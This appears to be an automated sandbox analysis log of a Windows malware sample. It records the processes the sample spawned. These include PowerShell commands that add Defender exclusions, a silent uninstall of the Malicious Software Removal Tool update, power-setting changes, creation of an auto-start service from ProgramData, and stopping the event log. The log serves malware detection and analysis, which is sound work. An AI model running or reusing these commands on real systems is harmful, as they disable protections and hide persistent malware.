            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\aA45th2ixY.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aA45th2ixY.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\aA45th2ixY.exeFile read: C:\Users\user\Desktop\aA45th2ixY.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\aA45th2ixY.exe "C:\Users\user\Desktop\aA45th2ixY.exe"
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OAQXWXCL"
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OAQXWXCL"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OAQXWXCL"Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OAQXWXCL"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
